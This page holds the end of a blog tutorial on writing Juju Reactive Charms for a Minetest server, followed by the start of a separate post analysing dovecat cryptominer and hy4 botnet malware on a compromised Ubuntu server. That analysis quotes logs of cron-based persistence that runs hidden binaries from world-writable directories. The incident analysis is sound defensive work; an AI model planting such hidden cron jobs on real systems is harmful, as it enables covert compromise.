<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">charms.reactive</span> <span class="kn">import</span> <span class="n">when</span><span class="p">,</span> <span class="n">when_not</span><span class="p">,</span> <span class="n">set_flag</span>
<span class="kn">from</span> <span class="nn">charmhelpers.core.host</span> <span class="kn">import</span> <span class="n">group_exists</span><span class="p">,</span> <span class="n">add_group</span><span class="p">,</span> <span class="n">user_exists</span><span class="p">,</span> <span class="n">adduser</span><span class="p">,</span> <span class="n">mkdir</span><span class="p">,</span> <span class="n">service</span><span class="p">,</span> <span class="n">service_restart</span><span class="p">,</span> <span class="n">chownr</span>
<span class="kn">from</span> <span class="nn">charmhelpers.core.templating</span> <span class="kn">import</span> <span class="n">render</span>
<span class="kn">from</span> <span class="nn">charmhelpers.core.hookenv</span> <span class="kn">import</span> <span class="n">log</span><span class="p">,</span> <span class="n">status_set</span><span class="p">,</span> <span class="n">application_version_set</span><span class="p">,</span> <span class="n">config</span><span class="p">,</span> <span class="n">relations_of_type</span>
<span class="kn">from</span> <span class="nn">charmhelpers.fetch</span> <span class="kn">import</span> <span class="n">get_upstream_version</span>
<span class="o">@</span><span class="n">when</span><span class="p">(</span><span class="s">'apt.installed.minetest'</span><span class="p">)</span>
<span class="o">@</span><span class="n">when_not</span><span class="p">(</span><span class="s">'minetest-server.installed'</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">install_minetest_server</span><span class="p">():</span>
<span class="n">log</span><span class="p">(</span><span class="s">"Setting up users and groups"</span><span class="p">,</span> <span class="s">'info'</span><span class="p">)</span>
<span class="c1"># Add minetest group to system if it doesn't exist
</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">group_exists</span><span class="p">(</span><span class="s">'minetest'</span><span class="p">):</span>
<span class="n">add_group</span><span class="p">(</span><span class="s">'minetest'</span><span class="p">,</span> <span class="n">system_group</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
<span class="c1"># Add minetest user to system if it doesn't exist
</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">user_exists</span><span class="p">(</span><span class="s">'minetest'</span><span class="p">):</span>
<span class="n">adduser</span><span class="p">(</span><span class="s">'minetest'</span><span class="p">,</span> <span class="n">system_user</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">primary_group</span><span class="o">=</span><span class="s">'minetest'</span><span class="p">,</span>
<span class="n">home_dir</span><span class="o">=</span><span class="s">'/home/minetest'</span><span class="p">)</span>
<span class="c1"># Ensure the minetest world directory exists
</span> <span class="n">mkdir</span><span class="p">(</span><span class="n">path</span><span class="o">=</span><span class="s">'/home/minetest/.minetest/worlds/world'</span><span class="p">,</span>
<span class="n">owner</span><span class="o">=</span><span class="s">'minetest'</span><span class="p">,</span>
<span class="n">group</span><span class="o">=</span><span class="s">'minetest'</span><span class="p">,</span>
<span class="n">perms</span><span class="o">=</span><span class="mo">0o775</span><span class="p">)</span>
<span class="c1"># Ensure permissions are correct
</span> <span class="n">chownr</span><span class="p">(</span><span class="n">path</span><span class="o">=</span><span class="s">'/home/minetest'</span><span class="p">,</span>
<span class="n">owner</span><span class="o">=</span><span class="s">'minetest'</span><span class="p">,</span>
<span class="n">group</span><span class="o">=</span><span class="s">'minetest'</span><span class="p">,</span>
<span class="n">chowntopdir</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
<span class="n">log</span><span class="p">(</span><span class="s">"Installing systemd service files"</span><span class="p">,</span> <span class="s">'info'</span><span class="p">)</span>
<span class="c1"># Install the systemd service file
</span> <span class="n">render</span><span class="p">(</span><span class="n">source</span><span class="o">=</span><span class="s">'minetest.service'</span><span class="p">,</span>
<span class="n">target</span><span class="o">=</span><span class="s">'/etc/systemd/system/minetest.service'</span><span class="p">,</span>
<span class="n">owner</span><span class="o">=</span><span class="s">'root'</span><span class="p">,</span>
<span class="n">group</span><span class="o">=</span><span class="s">'root'</span><span class="p">,</span>
<span class="n">perms</span><span class="o">=</span><span class="mo">0o644</span><span class="p">,</span>
<span class="n">context</span><span class="o">=</span><span class="p">{</span>
<span class="p">})</span>
<span class="c1"># Set the version number in Juju to what was installed
</span> <span class="n">application_version_set</span><span class="p">(</span><span class="n">get_upstream_version</span><span class="p">(</span><span class="s">'minetest'</span><span class="p">))</span>
<span class="c1"># Enable the minetest service
</span> <span class="n">service</span><span class="p">(</span><span class="s">'enable'</span><span class="p">,</span> <span class="s">'minetest.service'</span><span class="p">)</span>
<span class="c1"># We are all installed now, we don't need to call this function again
</span> <span class="n">set_flag</span><span class="p">(</span><span class="s">'minetest-server.installed'</span><span class="p">)</span>
<span class="o">@</span><span class="n">when</span><span class="p">(</span><span class="s">'config.changed'</span><span class="p">)</span>
<span class="o">@</span><span class="n">when</span><span class="p">(</span><span class="s">'minetest.database.configured'</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">minetest_regenerate_configuration</span><span class="p">():</span>
<span class="n">status_set</span><span class="p">(</span><span class="s">'maintenance'</span><span class="p">,</span> <span class="s">'Configuring minetest'</span><span class="p">)</span>
<span class="c1"># Fetch our minetest and database configuration variables
</span> <span class="n">my_config</span> <span class="o">=</span> <span class="n">config</span><span class="p">()</span>
<span class="n">my_database</span> <span class="o">=</span> <span class="n">relations_of_type</span><span class="p">(</span><span class="s">'db'</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span>
<span class="n">log</span><span class="p">(</span><span class="s">"Installing minetest configuration file"</span><span class="p">,</span> <span class="s">'info'</span><span class="p">)</span>
<span class="c1"># Populate the configuration file and install it in place
</span> <span class="n">render</span><span class="p">(</span><span class="n">source</span><span class="o">=</span><span class="s">'world.mt'</span><span class="p">,</span>
<span class="n">target</span><span class="o">=</span><span class="s">'/home/minetest/.minetest/worlds/world/world.mt'</span><span class="p">,</span>
<span class="n">owner</span><span class="o">=</span><span class="s">'minetest'</span><span class="p">,</span>
<span class="n">group</span><span class="o">=</span><span class="s">'minetest'</span><span class="p">,</span>
<span class="n">perms</span><span class="o">=</span><span class="mo">0o664</span><span class="p">,</span>
<span class="n">context</span><span class="o">=</span><span class="p">{</span>
<span class="s">'config'</span><span class="p">:</span><span class="n">my_config</span><span class="p">,</span>
<span class="s">'database'</span><span class="p">:</span><span class="n">my_database</span><span class="p">,</span>
<span class="p">})</span>
<span class="c1"># Restart the minetest service to take on new config
</span> <span class="n">service_restart</span><span class="p">(</span><span class="s">'minetest.service'</span><span class="p">)</span>
<span class="c1"># Tell Juju that minetest is good to go
</span> <span class="n">status_set</span><span class="p">(</span><span class="s">'active'</span><span class="p">,</span> <span class="s">'Configuration file written'</span><span class="p">)</span>
<span class="o">@</span><span class="n">when</span><span class="p">(</span><span class="s">'db.database.available'</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">database_connected</span><span class="p">():</span>
<span class="c1"># We have a database now, so we can generate config anytime now
</span> <span class="n">set_flag</span><span class="p">(</span><span class="s">'minetest.database.confgured'</span><span class="p">)</span>
<span class="c1"># Generate the config file with database credentials
</span> <span class="n">minetest_regenerate_configuration</span><span class="p">()</span>
<span class="o">@</span><span class="n">when_not</span><span class="p">(</span><span class="s">'db.connected'</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">missing_database</span><span class="p">():</span>
<span class="n">status_set</span><span class="p">(</span><span class="s">'blocked'</span><span class="p">,</span> <span class="s">'Relation to postgresql required'</span><span class="p">)</span>
</code></pre></div></div>
<p>We first import all the functions we need from the <code class="language-plaintext highlighter-rouge">charmhelpers</code> Python module,
which is actually quite a lot for our small piece of code, but that’s okay, since
we want charmhelpers to do our heavy lifting.</p>
<p>We next have a function <code class="language-plaintext highlighter-rouge">install_minetest_server()</code>, that acts as a singleton
like I described when I mentioned how flags work. It has an extra condition
though, and that is <code class="language-plaintext highlighter-rouge">@when('apt.installed.minetest')</code>. This ensures that
we only call <code class="language-plaintext highlighter-rouge">install_minetest_server()</code> once the <code class="language-plaintext highlighter-rouge">apt</code> layer has completed
installing the <code class="language-plaintext highlighter-rouge">minetest</code> package.</p>
<p>In <code class="language-plaintext highlighter-rouge">install_minetest_server()</code>, we set up the <code class="language-plaintext highlighter-rouge">minetest</code> user and group, set up
a <code class="language-plaintext highlighter-rouge">/home</code> directory and world directory, and install a systemd service file. We
also get the minetest package version and expose it to Juju for pretty
<code class="language-plaintext highlighter-rouge">juju status</code> prompts with our actual minetest version.</p>
<p>Next up we have <code class="language-plaintext highlighter-rouge">minetest_regenerate_configuration()</code>, which collects the
Charm’s config parameters and database relation parameters, and renders the
variables into the template config file we created above. Smart, right? I thought
so. We also restart the systemd service to load the new configuration, and set
the Charm’s status to <code class="language-plaintext highlighter-rouge">active</code>.</p>
<p>We used two flags for <code class="language-plaintext highlighter-rouge">minetest_regenerate_configuration()</code>, which makes sure we
only call the function when both <code class="language-plaintext highlighter-rouge">config.changed</code> and <code class="language-plaintext highlighter-rouge">minetest.database.configured</code>
are set. <code class="language-plaintext highlighter-rouge">config.changed</code> acts like a hook in practice, and <code class="language-plaintext highlighter-rouge">minetest.database.configured</code>
is what actually stops the function from being run before a database is available.</p>
<p>To pull this off, we have two functions, <code class="language-plaintext highlighter-rouge">missing_database()</code> and
<code class="language-plaintext highlighter-rouge">database_connected()</code>. <code class="language-plaintext highlighter-rouge">missing_database()</code> sets the Charms status to <code class="language-plaintext highlighter-rouge">blocked</code>
when there isn’t a postgresql relation present, which is what we want, since
without a backing database, we can’t play minetest.</p>
<p><code class="language-plaintext highlighter-rouge">database_connected()</code> is called when we have a postgresql relation, and the
database is created and we have user credientals available. This is from the
<code class="language-plaintext highlighter-rouge">db.database.available</code> flag that the postgresql interface sets. We take the
opportunity to set ‘minetest.database.confgured’ so we can go ahead and render
our configuration, and then manually call <code class="language-plaintext highlighter-rouge">minetest_regenerate_configuration()</code>
to make that happen.</p>
<p>It’s not too complicated, and it actually turned out to be less code than the old
hook-based Charm.</p>
<h1 id="deploying-the-charm">Deploying the Charm</h1>
<p>Now that everything is in place, let’s go ahead and deploy the Charm to our
machines, and get our minetest server running.</p>
<h2 id="creating-the-controller">Creating the Controller</h2>
<p>We will be using LXD as the cloud backend for our Juju model today, so go ahead
and deploy a juju controller with the “localhost” backend:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>juju bootstrap <span class="nt">--bootstrap-series</span><span class="o">=</span>hirsute localhost lxd-controller
Creating Juju controller <span class="s2">"lxd-controller"</span> on localhost/localhost
Looking <span class="k">for </span>packaged Juju agent version 2.9.12 <span class="k">for </span>amd64
Located Juju agent version 2.9.12-ubuntu-amd64 at https://streams.canonical.com/juju/tools/agent/2.9.12/juju-2.9.12-ubuntu-amd64.tgz
To configure your system to better support LXD containers, please see: https://github.com/lxc/lxd/blob/master/doc/production-setup.md
Launching controller instance<span class="o">(</span>s<span class="o">)</span> on localhost/localhost...
- juju-6b05e2-0 <span class="o">(</span><span class="nb">arch</span><span class="o">=</span>amd64<span class="o">)</span>
Installing Juju agent on bootstrap instance
Fetching Juju Dashboard 0.8.1
Waiting <span class="k">for </span>address
Attempting to connect to 10.29.181.61:22
Connected to 10.29.181.61
Running machine configuration script...
Host key fingerprint is SHA256:H0KFu2A5tmmM2blQ5dJ70iMhav+6RJ+4wKrkTp08y2M
+---[RSA 2048]----+
| .. |
| o. |
| <span class="o">=</span>.. |
| X.<span class="o">=</span> |
| X.OS<span class="o">=</span><span class="nb">.</span> |
| o.B.Bo<span class="o">=</span>++. |
| o <span class="k">*</span>o+o.o+.. |
|+ .Eooo. |
|o+oo. ++. |
+----[SHA256]-----+
Bootstrap agent now started
Contacting Juju controller at 10.29.181.61 to verify accessibility...
Bootstrap <span class="nb">complete</span>, controller <span class="s2">"lxd-controller"</span> is now available
Controller machines are <span class="k">in </span>the <span class="s2">"controller"</span> model
Initial model <span class="s2">"default"</span> added
</code></pre></div></div>
<p>Note, I used <code class="language-plaintext highlighter-rouge">--bootstrap-series=hirsute</code> to use Hirsute as the operating system
for the controller.</p>
<p>We can confirm our controller deployed properly with <code class="language-plaintext highlighter-rouge">juju controllers</code>:</p>
<p><img src="/assets/images/2021_004.png" alt="juju controller" /></p>
<p>Looking at <code class="language-plaintext highlighter-rouge">juju status</code> we now have a nice empty model:</p>
<p><img src="/assets/images/2021_005.png" alt="juju status" /></p>
<h2 id="deploying-the-postgresql-charm">Deploying the PostgreSQL Charm</h2>
<p>Our Minetest Charm depends on postgresql as a database backend to store our
player information and world data, so let’s go ahead and deploy it first.</p>
<p>Things have changed slightly from the last time I wrote a blog post, with
Charms now being able to be found on <a href="https://charmhub.io/">Charmhub</a>, instead
of the Charm Store.</p>
<p>So, we go to Charmhub, and search for postgresql, and come across the entry
<a href="https://charmhub.io/postgresql">postgresql at revision 235</a>.</p>
<p>Deploying it is simple, we just run:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>juju deploy postgresql
Located charm <span class="s2">"postgresql"</span> <span class="k">in </span>charm-hub, revision 235
Deploying <span class="s2">"postgresql"</span> from charm-hub charm <span class="s2">"postgresql"</span>, revision 235 <span class="k">in </span>channel stable
</code></pre></div></div>
<p>and we can watch <code class="language-plaintext highlighter-rouge">juju status</code> while we wait.</p>
<p><img src="/assets/images/2021_006.png" alt="juju status" /></p>
<p>Eventually it will complete, and postgresql will be ready to use:</p>
<p><img src="/assets/images/2021_007.png" alt="juju status" /></p>
<h2 id="proofing-and-building-our-minetest-charm">Proofing and Building our Minetest Charm</h2>
<p>We can do a quick sanity check over our charm with <code class="language-plaintext highlighter-rouge">charm proof</code>, which tells us
if we are missing anything critical, or need to change some boilerplate code.</p>
<p><img src="/assets/images/2021_008.png" alt="charm proof" /></p>
<p>In our case, we are missing some hooks, which we will add later.</p>
<p>If everything looks okay, go ahead and build your charm with <code class="language-plaintext highlighter-rouge">charm build</code>:</p>
<p><img src="/assets/images/2021_009.png" alt="charm build" /></p>
<p>All green, fantastic! Time to deploy.</p>
<h2 id="deploying-our-minetest-charm">Deploying our Minetest Charm</h2>
<p>Our Charm was built and placed into <code class="language-plaintext highlighter-rouge">/tmp/charm-builds/minetest-server</code>, so
point Juju at that location, and deploy away:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>juju deploy /tmp/charm-builds/minetest-server
Located <span class="nb">local </span>charm <span class="s2">"minetest-server"</span>, revision 0
Deploying <span class="s2">"minetest-server"</span> from <span class="nb">local </span>charm <span class="s2">"minetest-server"</span>, revision 0
</code></pre></div></div>
<p>We can watch <code class="language-plaintext highlighter-rouge">juju status</code> like normal to see how it went:</p>
<p><img src="/assets/images/2021_010.png" alt="juju status" /></p>
<p>Ouch. Error in the install hook. Not a problem, Juju can tell us what went
wrong in an instant, with the <code class="language-plaintext highlighter-rouge">juju debug-log</code> command. Run that, and let’s see
what went wrong:</p>
<p><img src="/assets/images/2021_011.png" alt="juju debug-log" /></p>
<p>Silly me, it seems I forgot to import the logging helpers. Not to worry, we can
fix that right up. Add the following to the top of <code class="language-plaintext highlighter-rouge">reactive/minetest_server.py</code>:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">charmhelpers.core.hookenv</span> <span class="kn">import</span> <span class="n">log</span><span class="p">,</span> <span class="n">status_set</span>
</code></pre></div></div>
<p>and we should be good to go. But if you happen to have a different problem,
don’t forget you can <code class="language-plaintext highlighter-rouge">juju ssh minetest-server/0</code> to get a shell inside the
minetest LXD container, where you can debug from there.</p>
<p><img src="/assets/images/2021_013.png" alt="juju ssh" /></p>
<p>The charm itself lives in <code class="language-plaintext highlighter-rouge">/var/lib/juju/agents/unit-minetest-server-0/charm/</code>,
so <code class="language-plaintext highlighter-rouge">cd</code> into there, edit <code class="language-plaintext highlighter-rouge">minetest-server.py</code> in <code class="language-plaintext highlighter-rouge">vim</code>, save and exit.</p>
<p><img src="/assets/images/2021_014.png" alt="juju location" /></p>
<p>We don’t have to redeploy the entire Charm for small bugfixes, and on production
servers you might not have that luxury at all. Instead, we can run:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>juju resolved minetest-server/0
</code></pre></div></div>
<p>and this tells Juju that we fixed the errors, and to re-try that hook again. If
we check <code class="language-plaintext highlighter-rouge">juju status</code>, it seems to have worked:</p>
<p><img src="/assets/images/2021_012.png" alt="juju status" /></p>
<p>We are now waiting on our database connection, so let’s make the relation happen:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>juju relate postgresql:db minetest-server:db
</code></pre></div></div>
<p>Checking <code class="language-plaintext highlighter-rouge">juju status</code> now, we see all green, and that our configuration file
has been written correctly:</p>
<p><img src="/assets/images/2021_015.png" alt="juju status" /></p>
<p>This is promising! Let’s expose the port:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>juju expose minetest-server
</code></pre></div></div>
<p>Open up minetest, and connect to the server listed at <code class="language-plaintext highlighter-rouge">private-address</code> in
<code class="language-plaintext highlighter-rouge">juju status</code>, which is <code class="language-plaintext highlighter-rouge">10.29.181.198</code> in my case, on port <code class="language-plaintext highlighter-rouge">30000</code>, which we
set in our configuration:</p>
<p><img src="/assets/images/2021_016.png" alt="minetest connect" /></p>
<p>Click connect, and wow, it works! We find ourselves in a snowy world, all
powered by Minetest + Postgresql + Juju with Reactive Charms. Very fancy, and
production ready.</p>
<p><img src="/assets/images/2021_017.png" alt="minetest working" /></p>
<h1 id="debugging-the-charm">Debugging the Charm</h1>
<p>Now that we have written our Reactive Charm, we also need to be able to debug it
and know what to do when things go wrong. These tips should help.</p>
<h2 id="getting-debug-logs">Getting Debug Logs</h2>
<p>As mentioned when we were writing the Reactive code, your first port of call
when you run into a problem is to run <code class="language-plaintext highlighter-rouge">juju debug-log</code>. This gives you the log
outputs of all active running Charms, and any error messages like stack traces
are very prominent and repeated often, so you won’t miss anything.</p>
<p><img src="/assets/images/2021_019.png" alt="juju debug-log" /></p>
<p>Make sure to make use of <code class="language-plaintext highlighter-rouge">log()</code> from <code class="language-plaintext highlighter-rouge">charmhelpers.core.hookenv</code>, and use it
to write useful information to the Juju log, as well as to print debug information,
much like a <code class="language-plaintext highlighter-rouge">print</code> statement or <code class="language-plaintext highlighter-rouge">printk</code>. I did this a lot when writing this charm,
so I could see the contents of <code class="language-plaintext highlighter-rouge">relations_of_type()</code> with Python’s <code class="language-plaintext highlighter-rouge">dir()</code>.</p>
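<p>A throwaway debug line like the following (illustrative only, not part of the
final Charm) is often all you need:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>from charmhelpers.core.hookenv import log, relations_of_type

# Dump the db relation data to the Juju log, then read it back
# with `juju debug-log`.
rels = relations_of_type('db')
log("db relations: {}".format(rels), 'info')
if rels:
    log("first relation attributes: {}".format(dir(rels[0])), 'info')
</code></pre></div></div>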
<p>It’s also very helpful to have <code class="language-plaintext highlighter-rouge">juju debug-log</code> running in a window on a second
screen so you can keep a detailed watch of deployment progress when you are
developing your charm.</p>
<h2 id="debugging-hooks-and-examining-flags-at-runtime">Debugging Hooks and Examining Flags at Runtime</h2>
<p>In the previous article, we used <code class="language-plaintext highlighter-rouge">juju debug-hooks application-name/unit</code> to
access a <code class="language-plaintext highlighter-rouge">tmux</code> session to see what data is exchanged during various hooks like
<code class="language-plaintext highlighter-rouge">db-relation-joined</code> and <code class="language-plaintext highlighter-rouge">config-changed</code>.</p>
<p>We can still do all of that, but <code class="language-plaintext highlighter-rouge">juju debug-hooks</code> has gotten more powerful
for Reactive Charms.</p>
<p>If you run:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>juju debug-hooks minetest-server/5
</code></pre></div></div>
<p>You get the same <code class="language-plaintext highlighter-rouge">tmux</code> session:</p>
<p><img src="/assets/images/2021_020.png" alt="juju debug-hooks" /></p>
<p>Now, we can run hooks manually by executing the python scripts that are
backing them, in the <code class="language-plaintext highlighter-rouge">hooks</code> directory of the Charm.</p>
<p>The session is opened to the Charm directory, at
<code class="language-plaintext highlighter-rouge">var/lib/juju/agents/unit-minetest-server-5/charm</code>, so we can <code class="language-plaintext highlighter-rouge">ls hooks/</code>
to see what we can run:</p>
<p><img src="/assets/images/2021_021.png" alt="juju debug-hooks" /></p>
<p>If we wanted to run <code class="language-plaintext highlighter-rouge">config-changed</code> manually, we can do this with:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>python3 hooks/config-changed
</code></pre></div></div>
<p>and it runs. Very useful if you need to watch what is happening in
<code class="language-plaintext highlighter-rouge">juju debug-log</code> concurrently.</p>
<p>But what happens if your flags aren’t getting hit? No worries, we can see what
the values for the flags are by running:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>charms.reactive <span class="nt">-p</span> get_flags
</code></pre></div></div>
<p><img src="/assets/images/2021_022.png" alt="juju get-flags" /></p>
<p>Not only can we see what they are actually called (which is useful in itself,
I thought <code class="language-plaintext highlighter-rouge">db.available</code> was a flag, but it was actually called
<code class="language-plaintext highlighter-rouge">db.database.available</code> instead, and <code class="language-plaintext highlighter-rouge">get_flags()</code> told me this), but we can
also see if they are set or unset, with commands like <code class="language-plaintext highlighter-rouge">all_flags_set()</code>,
<code class="language-plaintext highlighter-rouge">get_unset_flags()</code>, <code class="language-plaintext highlighter-rouge">is_flag_set()</code>, and we can also change flags with
<code class="language-plaintext highlighter-rouge">set_flag()</code>, <code class="language-plaintext highlighter-rouge">clear_flag()</code>, <code class="language-plaintext highlighter-rouge">toggle_flag()</code>. Very useful.</p>
<h1 id="cleaning-up">Cleaning Up</h1>
<p>Once we have had our fun and want to reclaim some disk space back, we can tear
down and remove the deployment with:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>juju remove-application minetest-server
removing application minetest-server
<span class="nv">$ </span>juju remove-application postgresql
removing application postgresql
</code></pre></div></div>
<p>You can check <code class="language-plaintext highlighter-rouge">juju status</code> to keep an eye on progress. If anything gets stuck,
you can forcefully remove a machine (machine 5 in this example) with:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>juju remove-machine 5 <span class="nt">--force</span>
</code></pre></div></div>
<p>If you want to remove your controller, then run:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>juju destroy-controller lxd-controller <span class="nt">--destroy-all-models</span>
WARNING! This <span class="nb">command </span>will destroy the <span class="s2">"lxd-controller"</span> controller.
This includes all machines, applications, data and other resources.
Continue? <span class="o">(</span>y/N<span class="o">)</span>:y
Destroying controller
Waiting <span class="k">for </span>hosted model resources to be reclaimed
Waiting <span class="k">for </span>1 model
All hosted models reclaimed, cleaning up controller machines
</code></pre></div></div>
<h1 id="conclusion">Conclusion</h1>
<p>In this article we revisited writing Juju Charms, this time taking the more
modern and robust Reactive Charms for a spin. We ported our simple Minetest
Charm to Reactive, which was quite straightforward, and managed to make our
code simpler than when we had hook-based Charms.</p>
<p>I enjoyed digging into all the new Charmhelper functionality and getting my
head around how flags work, and I hope it has been useful with helping you to
write your own Reactive Charms.</p>
<p>Hopefully you enjoyed the read, and as always feel free to <a href="/about">contact me</a>.</p>
<p>Matthew Ruffell</p>Matthew RuffellIt has been a really long time since my last blog post, so let’s fix that by writing a followup post to my popular article on learning to write Juju Charms, where we wrote a simple Charm to deploy a production ready Minetest server, complete with postgresql integration through Juju relations. Today, we are going to go a step further and delve into Reactive Charms, where we can define and maintain state through flags. Flags let us have a memory of events that have happened in the past, and only run certain functions to “react” to changes in those flags. Reactive Charms are primarily written in Python, and there are a lot of different submodules that exist to help you develop your Charm. So buckle up, because we are going to take our little Minetest Charm to the next level.Analysis of the dovecat and hy4 Linux Malware2020-10-27T00:00:00+00:002020-10-27T00:00:00+00:00https://ruffell.nz/reverse-engineering/writeups/2020/10/27/analysis-of-the-dovecat-and-hy4-linux-malware<p>A few days ago, a case came in which had some rather odd symptoms, such as
processes using high amounts of CPU and memory, and running from the <code class="language-plaintext highlighter-rouge">/tmp</code>
directory.</p>
<p>After asking for some logs, and some samples of the binaries, it became obvious
that the system was compromised, and was now running some interesting malware.</p>
<p>In this post, we are going to look into the malware called <strong>dovecat</strong>, which
turned out to be a cryptominer, and <strong>hy4</strong>, which is a IRC botnet malware
dropper.</p>
<p><img src="/assets/images/2020_024.png" alt="hero" /></p>
<p>I’m pretty excited, as I haven’t analysed any Linux malware before, and this is
real life stuff pulled directly from a production machine, so it still has its
fangs intact.</p>
<p>Let’s get started.</p>
<!--more-->
<h1 id="problem-description">Problem Description</h1>
<p>This case caught my eye as soon as I saw it in the queue. The description
mentions that a process called <strong>dovecat</strong> was using a large amount of CPU time
and most of the system’s memory, and was causing the machine to run slowly.</p>
<p>dovecat did not seem to match any service the system was running, and there
are files in the <code class="language-plaintext highlighter-rouge">/tmp</code> directory owned by the service which is running the
dovecat process. It all looked rather suspicious, and a case was filed.</p>
<p>Now, the description alone raises a bunch of red flags. Is the dovecat
executable itself in <code class="language-plaintext highlighter-rouge">/tmp</code>? Are the files in <code class="language-plaintext highlighter-rouge">/tmp</code> configuration, or more
malware? No legitimate programs place files in <code class="language-plaintext highlighter-rouge">/tmp</code> for anything other than
temporary storage. Malware, on the other hand, favours <code class="language-plaintext highlighter-rouge">/tmp</code> because any user
has the ability to write there.</p>
<p>We needed more information, so we asked for a sosreport. The logs were
extremely interesting. The system itself is Ubuntu 18.04, but it is massively
out of date. It looks like it hasn’t been patched in 1 - 2 years. Here’s what
I found:</p>
<p>Firstly, looking at <code class="language-plaintext highlighter-rouge">ps aux</code>, we can see that dovecat is indeed running from
<code class="language-plaintext highlighter-rouge">/tmp</code>, as the system daemon user:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>daemon 100394 397 29.4 2894488 2402584 ? Sl 05:34 735:24 /tmp/dovecat
</code></pre></div></div>
<p>The kernel logs showed that dovecat was segfaulting occasionally:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kernel: [2394416.671219] dovecat[46657]: segfault at 63 ip 00007f2be096b448 sp 00007f2be2393490 error 4 in libnss_files-2.27.so[7f2be0968000+b000]
kernel: [2424348.437406] dovecat[53028]: segfault at 63 ip 00007f45e1b60448 sp 00007f45e3588490 error 4 in libnss_files-2.27.so[7f45e1b5d000+b000]
kernel: [2431562.775108] dovecat[54622]: segfault at 63 ip 00007feec3df1448 sp 00007feec9831490 error 4 in libnss_files-2.27.so[7feec3dee000+b000]
kernel: [2467413.285152] dovecat[62803]: segfault at 63 ip 00007f803f8be448 sp 00007f80412e6490 error 4 in libnss_files-2.27.so[7f803f8bb000+b000]
</code></pre></div></div>
<p>syslog also showed some strange and alarming cronjobs running with odd names:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CRON[105618]: (daemon) CMD (/var/lock/bash7 > /dev/null 2>&1 &^M)
CRON[105617]: (CRON) info (No MTA installed, discarding output)
CRON[105627]: (daemon) CMD (/var/tmp/sh7 > /dev/null 2>&1 &^M)
CRON[105625]: (CRON) info (No MTA installed, discarding output)
CRON[105628]: (daemon) CMD (/tmp/bash7 > /dev/null 2>&1 &^M)
CRON[105626]: (CRON) info (No MTA installed, discarding output)
CRON[105712]: (root) CMD (command -v debian-sa1 > /dev/null && debian-sa1 1 1)
CRON[105753]: (daemon) CMD (/var/tmp/sh7 > /dev/null 2>&1 &^M)
CRON[105751]: (CRON) info (No MTA installed, discarding output)
CRON[105754]: (daemon) CMD (/dev/shm/bash7 > /dev/null 2>&1 &^M)
CRON[105758]: (daemon) CMD (/tmp/bash7 > /dev/null 2>&1 &^M)
CRON[105749]: (CRON) info (No MTA installed, discarding output)
CRON[105756]: (daemon) CMD (/var/lock/bash7 > /dev/null 2>&1 &^M)
CRON[105757]: (daemon) CMD (/tmp/init7 > /dev/null 2>&1 &^M)
CRON[105748]: (CRON) info (No MTA installed, discarding output)
CRON[105752]: (CRON) info (No MTA installed, discarding output)
CRON[105750]: (CRON) info (No MTA installed, discarding output)
</code></pre></div></div>
<p>Where do I even begin?</p>
<p>dovecat was indeed running directly from <code class="language-plaintext highlighter-rouge">/tmp</code> as <code class="language-plaintext highlighter-rouge">/tmp/dovecat</code>. Note that every
crash dereferences the same bogus address <code class="language-plaintext highlighter-rouge">0x63</code>, at the same offset into the library
(for instance, <code class="language-plaintext highlighter-rouge">0x7f2be096b448 - 0x7f2be0968000 = 0x3448</code>). Segfaulting inside
<code class="language-plaintext highlighter-rouge">libnss_files-2.27.so</code> means that dovecat was either poorly written, was trying to
use a system library it was not compiled against, or, if it was statically linked,
something went wrong in the linker stage.</p>
<p>The cronjobs are particularly alarming, since there are multiple executables,
all located in world writable places, such as <code class="language-plaintext highlighter-rouge">/tmp</code>, <code class="language-plaintext highlighter-rouge">/var/lock</code>, <code class="language-plaintext highlighter-rouge">/var/tmp</code>
and <code class="language-plaintext highlighter-rouge">/dev/shm</code>, and all use the same discard to <code class="language-plaintext highlighter-rouge">/dev/null</code> string:
<code class="language-plaintext highlighter-rouge">> /dev/null 2>&1 &^M</code>. These executables obviously want to hide their
output to evade detection, and are placed throughout the disk to gain redundant
persistence.</p>
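<p>For reference, the crontab entries behind those syslog lines presumably look
something like the following (reconstructed from the log output above; the real
schedule is unknown, and the trailing <code class="language-plaintext highlighter-rouge">^M</code> suggests the crontab was written with
DOS line endings):</p>
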